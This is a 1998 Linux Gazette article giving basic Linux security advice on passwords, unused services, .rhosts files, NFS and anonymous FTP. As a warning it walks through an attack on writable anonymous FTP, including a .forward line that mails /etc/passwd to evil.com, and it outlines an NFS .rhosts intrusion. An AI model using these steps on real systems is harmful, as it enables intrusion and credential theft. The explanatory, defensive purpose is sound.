old-www/LDP/LG/issue34/vertes.html

<!--startcut ==========================================================-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<title>Securing Your Linux Box LG #34</title>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#A000A0"
ALINK="#FF0000">
<!--endcut ============================================================-->

<H4>
"Linux Gazette...<I>making Linux just a little more fun!</I>"
</H4>

<P> <HR> <P> 
<!--===================================================================-->

<center>
<h1><font color="maroon">Securing Your Linux Box</font></h1>
<H4>By <a href="mailto:pvertes@bigfoot.com">Peter Vertes</a></H4>
</center>
<P> <HR> <P>  

With Linux becoming widespread in the work environment, the security of
the individual machines must be considered. Machines running Linux can be
networked easily, creating the potential risk of unauthorized users
gaining access. This is particularly true if your Linux installation is
straight out of the box. I will give a brief introduction to securing your
Linux box and making your network environment a safer place for both your
data and the people who use use it.
<p>
``You are only as strong as the weakest link in your
defense,'' says the Chinese proverb, and this is certainly true in
the field of computer security. 
If you forget to patch that newly downloaded version of
<b>lpd</b> all your walls can come crumbling down, even with the securest
system in the world.
Always be cautious when installing any new software. If you are using Linux only
as a desktop machine at home and you connect to the Internet via a modem,
you do not have to worry so much. On the other hand,
if you are running a mission-critical server wired into the Net, I would
strongly advise checking out the security history of any
piece of software that you wish to install (remembering <i>that</i>
famous version of Sendmail).
<p>
Several mailing lists and many web pages offer extensive help on Linux security.
The information is out there, you just need to go and
harvest it. If you don't have the time, patience or know-how, contact
a security consultant to take a look at your system setup and discover any
potential weak spots. Usually security consultant firms have their own
<i>Tiger Teams</i> who for a fee will attempt to make the walls crumble
around your computer(s). Their object is to get into your system under a
certain period of time and some even refund your money if they are
unsuccessful. Tiger Teams are a valuable asset to security-conscious
companies. Since Tiger Teams cost quite a bit, I would
suggest you break into your own machines. This exercise can save you money,
and give you a better understanding of the structure and different abstract
layers of Linux in the process.
<p>
The starting point of our Linux security tour is the password. Many
people keep their entire life on a computer and the only
thing preventing others from seeing it is the eight-character string called
a password. Not something one would call completely reliable.
Contrary to popular belief, an uncrackable password does not exist.
Given time and resources all passwords can be guessed either by social
engineering or by brute force.
<p>
Since password cracking can be a time- and resource-consuming art, make it
hard for any cracker who has grabbed your
password file. Running a password cracker on
a weekly basis on your system is a good idea. This helps to find and
replace passwords that are easily guessed or weak. Also, a password
checking mechanism should be present to reject a weak password when first
choosing a password or changing an old one. Character strings that are plain
dictionary words, or are all in the same case, or do not contain numbers
or special characters should not be accepted as a new password.
<p>
A safe password can be constructed by taking the first letter of your favorite
phrase, quote or sentence and adding special characters. For example, suppose
my favorite phrase is, ``the quick brown fox jumped over the lazy
dog,'' by taking the first letter of every word, I'd end up with
<b>tqbfjotld</b>. Next, I'd add special characters and perhaps
squeeze in the year resulting in a password of <b>9tqbf!jotld8</b>.
This is a much secure than the name of your spouse or child.
<p>
Word lists containing hundreds (if not thousands) of words that could be fed
to a password cracker are available
on the Internet. Some contain only names, so cracking the
password ``maggie'' is quite trivial while the likelihood
of <b>9tqbf!jotld8</b> appearing in one of those lists is quite slim.
However, even though if our proposed password is not likely to appear in a
word list, more advanced cracker programs come with a feature called
<i>Incremental Cracking Mode</i> which means that every possible
permutation is tried. The user gives it the minimum and maximum number of letters in a password, upper case or
lower case, inclusion of special characters and numbers, and the passwords
cracker does the rest. Granted, it could take a lot of time and resources,
but it is possible.
<p>
Next, be aware of the services running on your system.
Most distributions of Linux have HTTP, FTP, SMB, Sendmail and various other
services running as default. Not everyone needs a web server running so
why not get rid of it--it takes up resources and can be a potential
security risk. To terminate web services, type:
<pre>
kill -9 
</pre>
To find out the process ID(s) of a certain daemon or service, type:
<pre>
ps aux | grep 
</pre>
Also, comment these daemons out of your start-up scripts so that they
will not restart after a reboot.
Unused services can let others gain information about your system and they
could also pose as a security risk.
<p>
Another thing to avoid is the use of .rhosts files, as they are a favorite
of crackers. The .rhosts files contain names of systems on which you have an
account. When you use TELNET to log in to a system, the system checks its
.rhosts file and if your machine name is found, it gives you access without
the need for a password.
<p>
For more information about the .rhosts file, look in your favorite Linux or
System Administration manual. One of
the most famous exploits involving the .rhosts file is the misconfiguration
of the <i>Network File System</i> (NFS). First the hacker checks for any
exported file systems on your machines (to check, type:
<tt>showmount -e</tt>), and if any are world
writable. Next he remotely mounts your file system and places an .rhosts
file into a user's directory. Last, the hacker uses TELNET
to log into your machine as the that user, and your
system is now compromised. The moral of this story: leave the
configuration of the <b>nfsd</b> to someone who is more experienced than you
or read the documentation carefully.
<p>
Another similar hack involves the misconfiguration of a
popular service commonly found on the Internet; anonymous FTP. The first, and
obvious method, of gaining unauthorized access via anonymous FTP is by letting
the public have access to your password file. Granted all passwords
are stored in encrypted form, but remember we've already shown
crackers can get by this. Another way to gain access to the local password
file is by exploiting the writeability of the /ftp directory. Look at these simple steps:
<p>
<ol>
  <li> 	Create a fake .forward file that has the following command in
it:
</ol>
<pre>
	|/bin/mail evildude@evil.com &lt; /etc/passwd
</pre>
<ol>
  <li> 	Connect to the victim machine via FTP and log in as user
FTP.
  <li> 	Enter any password you wish.
  <li> 	Upload the .forward file you have created in Step 1.
  <li> 	Log out and send mail to ftp@victim.machine.com.
  <li> 	Sit back as victim.machine.com e-mails you a copy of its
local password file.
</ol>
Clearly, an easy way to get a password file. The heart of
this hack lies in a simple mistake made by the system administrator; so,
<i>never</i> make the /ftp directory writable by user
<i>anonymous</i>. Setting up an anonymous FTP server
is an art of its own, but it will help to remember these simple rules:
<p>
<ul>
  <li> 	<i>Only</i> the /incoming directory should be made
writable and <i>only</i> by root and user FTP.
  <li> 	Anonymous FTP users should have <i>only</i> executable (and
read) access to the /pub and the /incoming directory.
  <li> 	FTP users should <i>NOT</i> be able to write to
/ftp. If you enable write access, the above mentioned hack
can (and presumably will) be made. For more information
on how to correctly set up an anonymous FTP service, check out the man
page for <b>ftpaccess</b> or the CERT advisory titled 93:10 (found at
http://www.cert.org/).
</ul>
One last thing to remember is that the system logs are your friends.
The logs are the only way to find out what is/has/will be happening on your
system, so keep reading them. Also, make sure that they are not
being tampered with by intruders or by fellow system administrators.
<p>
As Linux finds its way into more and more corporate environments, it is a
crucial step to keep users out of each other's files and patch all
the holes that might be utilized by hackers. With the notion of
interconnectivity, industrial espionage will
also be on the rise. With simple preventative measures and user
education, the workplace can be a safe place for your secrets.

<!--===================================================================-->
<P> <hr> <P> 
<center><H5>Copyright &copy; 1998, Peter Vertes <BR> 
Published in Issue 34 of <i>Linux Gazette</i>, November 1998</H5></center>

<!--===================================================================-->
<P> <hr> <P> 
<A HREF="./index.html"><IMG ALIGN=BOTTOM SRC="../gx/indexnew.gif" 
ALT="[ TABLE OF CONTENTS ]"></A>
<A HREF="../index.html"><IMG ALIGN=BOTTOM SRC="../gx/homenew.gif"
ALT="[ FRONT PAGE ]"></A>
<A HREF="./ayers3.html"><IMG SRC="../gx/back2.gif"
ALT=" Back "></A>
<A HREF="./lisse.html"><IMG SRC="../gx/fwd.gif" ALT=" Next "></A>
<P> <hr> <P> 
<!--startcut ==========================================================-->
</BODY>
</HTML>
<!--endcut ============================================================-->